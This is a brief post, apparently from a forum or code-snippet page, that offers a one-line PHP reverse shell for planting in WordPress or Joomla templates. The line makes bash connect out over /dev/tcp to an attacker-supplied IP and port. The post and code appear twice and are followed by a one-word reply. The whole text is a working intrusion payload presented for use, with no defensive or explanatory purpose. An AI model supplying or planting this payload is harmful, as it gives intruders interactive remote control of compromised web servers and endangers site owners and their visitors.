Simple PHP Reverse Shell for when you have the option to edit templates in WordPress, Joomla, etc.
<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/*your_ip*/*port* 0>&1’”); ?>
Simple PHP Reverse Shell for when you have the option to edit templates in WordPress, Joomla, etc.
<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/*your_ip*/*port* 0>&1’”); ?>
Nice!